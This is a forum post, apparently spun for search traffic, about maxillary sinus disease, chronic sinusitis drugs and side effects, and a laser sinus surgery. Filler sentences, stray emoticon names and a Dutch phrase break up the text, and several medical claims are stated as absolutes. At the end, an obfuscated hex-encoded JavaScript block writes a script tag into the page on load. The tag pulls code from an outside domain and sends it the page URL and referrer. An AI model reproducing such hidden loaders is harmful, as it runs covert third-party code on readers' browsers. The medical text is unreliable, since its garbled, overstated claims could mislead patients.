Causes of Maxillary Sinus Disease

Go down

Causes of Maxillary Sinus Disease Empty Causes of Maxillary Sinus Disease

Post by Admin Sat Sep 17, 2016 6:53 pm

Sinus Treatment

There are four main sinus cavities in the head. They are frontal, ethmoid, sphenoid and maxillary. As the name suggests, maxillary sinus disease occurs when the membrane of the maxillary sinus cavity becomes inflamed. The maxillary sinuses are basically located below the eyes on either side of the nose. The inflammation of the mucous membrane may be due to infection or allergy.

Jaw pain caused due to maxillary sinus disease is often confused with regular dental pain though there is a major difference. Jaw pain associated with sinusitis com always accompanied by symptoms like fever, fatigue, nasal discharge and headache. This does not happen in case of dental pain. Jaw pain due to sinusitis always occurs in the upper back teeth whereas dental pain can occur in any part of the teeth. After many hopeless endeavors to produce something worthwhile on Sinus Disease, this is what we have come up with. We are very hopeful about this! Wink

• Though sinus can easily be cured by medication like anti-inflammatory drugs and decongestants, surgery may also be required at times.
  • Nasal irrigation i.e. removing the mucous with the help of warm saline water and a syringe is another technique used to cure sinus.
  • Some doctors also recommend a warm compress on the affected parts of the face. Rolling Eyes

Relief from Sinusitis: Home Treatment for Chronic Disease Sinusitis

Causes of Maxillary Sinus Disease Ca-c-a-c-aedac-f-d-e51

Maxillary Sinus Disease can Also Occur Due to Lack of Oral Health

If a person does not take care of his/ her teeth in a proper manner, there is growth of bacteria in the teeth and the gums. The bacteria may then spread to the maxillary sinus as the sinus cavity is connected to the nasal cavity and the mouth. Maxillary sinus may also cause jaw pain.

Jaw pain or other symptoms sinusitis due to maxillary sinus disease should not be ignored. A dentist should be consulted as soon as possible. If the dentist suspects sinusitis, he/she will further recommend the patient to a general physician. Medication should be taken at the earliest to avoid complications and surgery.

Maxillary Sinus Disease Basically Causes Tenderness and Acute Pain in the Cheeks

It may also cause swelling of facial muscles. Pain in the upper or back teeth may also occur. This pain increases on bending down. You will learn the gravity of Maxillary Sinus once you are through reading this matter. Maxillary Sinus are very important, so learn its importance.

Many People Nowadays are Affected by Sinus Infections

There are so many people that suffer from sinus infections, that in some countries alone there are more than five hundred thousand surgeries that are performed every year to help you get rid of a sinus infection. Laughing

The treatment for chronic sinus infection is simple, but to treat this type of sinus infection successfully is a little more difficult. The main reason is because symptoms of sinus infection tend to last longer even when you have an antibiotics treatment for sinus infection. The main drugs used in treating a sinus infection that is chronic are decongestants and antibiotics. Nasal sprays are also used in patients that have a chronic sinus infection. There are some side effects that should be taken into consideration before starting the sinus infection treatmnet.any of the antihistamines that you can buy without a prescription to treat your sinus infection can cause drowsiness. The decongestants used in treating the chronic sinus infection can also elevate blood pressure and faster your heart rate. You might also have problems sleeping when using this sinus infection treatment. If you use nasal steroids to treat the sinus infection, be very careful because it can cause nose bleeds and crusts.

The Medical Term for a Sinus Infection is Sinusitis

Sinus infection can be acute or chronic. What happens in cases of sinus infection is that the sinuses found in your nose get inflammed. These sinuses that are found in your nose are cavities which are hollow and can be found near your eyes. In most of the sinus infection cases, the main reasons are structural problems, allergies or infections. Sinus infections can also be triggered by a cold. The acute form of the sinus infection lasts less than a month. If you see that the symptoms for sinus infection continue after this period and that they even get worse, you might have another problem. Chronische sinusitis symptomen lasts about four months. One of the diseases that has been associated with a chronic sinus infection case is allergies. The inhalation of allergens, which in turn trigger an allergic reaction is also another reason for a chronic sinus infection. Furthermore, people that suffer from asthma are also more at risk of developing the chronic form of sinus infection than others. The weather can also affect many people that suffer from chronic sinus infection. It was with great optimism that we started out on writing this composition on Sinuses. Please don't let us lose this optimism. Evil or Very Mad

Gentleman Named Jason Contacted Me and Said He Recently Had Sinus Laser Surgery from Dr

Harvey Paley, whose practice is in Beverly Hills, CA. He said flatly that this operation 'changed my life'. This gentleman has had 3 other conventional surgeries in the past 15 years during which time he had lost his sense of smell and sense of taste. Hearing about such a success after a sinus operation is rare in my experience. I personally have had two of them, and they basically didn't work, since I continued to have sinus infections after both of them. In fact, I've heard of very few people who have had sinus surgery and who were pleased about the results over time.

So when someone is as enthusiastic about his operation as Jason is, it is time to listen, especially considering his background of sinus problems. The operational procedure is called Sinu-Clear, and it uses a laser as well as an endoscope. The laser equipment also provides a steady stream of salt water to flow through the nasal passageways while the operation is taking place. There is apparently very little bleeding during the procedure, since the laser cauterizes the tissue being operated on. Because of this there is no need for nasal packing, and this is a huge positive, as those of us who have gone through a conventional operation with a scalpel and had our noses packed can attest. For me it was just awful. The endoscope allows for good viewing by the surgeon, as the camera projects a picture of the nasal cavities being worked on onto a television screen. Getting information on specific topics can be quite irritating for some. This is the reason this article was written with as much matter pertaining to Sinus Cavities as possible. This is the way we aim to help others in learning about Sinus Cavities.

This Type of Approach Seems to Make Perfect Sense

That is, using laser and endoscope technology to limit bleeding and see clearly what is being operated on. The first question I had is 'why are there only a small handful of surgeons in the U.S. doing this operation?' It is not brand new, and in fact this laser sinus surgery was apparently pioneered by Dr. Daniel M. Schuman from Boca Raton, Florida over 10 years ago. Apparently Dr. Schuman has subsequently retired from his medical practice. Very Happy.

Addition to Dr

Paley in Beverly Hills, CA, I found out about two other otolaryngologists who perform the Sinu-Clear sinus laser operation. One is Dr. Vincent Pisciotta in Biloxi, Mississippi, and the other is Dr. Robert Bonham in Dallas, Texas. Dr. Bonham also performs another new operation called Sinuplasty, which is similar to angioplasty but for the sinus cavities. I understand there may be a few other surgeons in the country who routinely perform the Sinu-Clear operation, and I intend to continue to research this and get the word out. Results will be posted on the blog and forum at ***** I only wish I had heard about this sinus laser surgery procedure years ago. It sounds like it might have been more effective and certainly less painful than the operations I did have. If you are considering being one of the 300,000 people who have sinus operations in the U.S. alone, this procedure is certainly something to know about and consider as an option, even if it were to require travel. Evil or Very Mad

Asked this question to a gentleman from the company that produces the Sinu-Clear laser equipment, a company called PhotoMedex. He said there are many reasons for so few surgeons using the procedure, and most seem to boil down to the reluctance of people, in this case sinus surgeons, to change. In fact PhotoMedex is emphasizing different product lines of medical laser equipment, and the gentleman I spoke with was not optimistic about growth aspects for this procedure. To me this is certainly a shame. I personally have only spoken to one person, Jason, who has undergone the procedure, but he is extremely enthusiastic. I hope to speak to others and get more inputs. I can only say that when someone who has had 3 other operations tries sinus laser surgery and says he has finally regained his sense of smell again after 15 years, then this is worth taking note of, at the very least.

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

https://domenicpenning.forumotion.com

Back to top Go down